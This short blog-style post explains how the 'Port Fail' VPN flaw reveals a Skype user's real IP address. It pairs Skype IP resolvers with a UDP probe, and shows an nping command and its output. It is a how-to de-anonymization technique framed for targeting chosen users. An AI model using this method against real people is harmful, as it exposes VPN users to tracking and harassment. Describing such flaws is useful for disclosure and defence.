Port Fail Vulnerability : Critical VPN Vulnerability

How Port Fail Vulnerability Exposes your REAL IP on SKYPE

Using Port Fail Vulnerability it’s possible to disclose the real IP of a Skype accounts you’re interested in. There are a bunch of Skype IP resolvers which can give you the VPN IP address and port number of a Skype user using only their Skype login.

Then you need to use the same thing a copyright monitoring company would use — send some UDP packets to the whole internet on the exact port. It’s remarkable but Skype will send you a reply for almost any data! The nping utility from nmap package suits our needs very well:

# nping --udp -p 13318 --data-string 'hellothere!' -c 1 serv.valdikss.org.ru
Starting Nping 0.7.00 ( https://nmap.org/nping ) at 2015-12-20 19:54 MSK
SENT (0.0157s) UDP 195.154.127.59:53 > 92.42.31.8:13318 ttl=64 id=10802 iplen=39 
RCVD (0.0859s) UDP 185.61.149.121:4272 > 195.154.127.59:53 ttl=54 id=1534 iplen=32 
 
Max rtt: N/A | Min rtt: N/A | Avg rtt: N/A

So , conviniently the real IP adderess of any Skype user is easily recovered . That’s a different story what the hacker can do if he tracks your real IP :p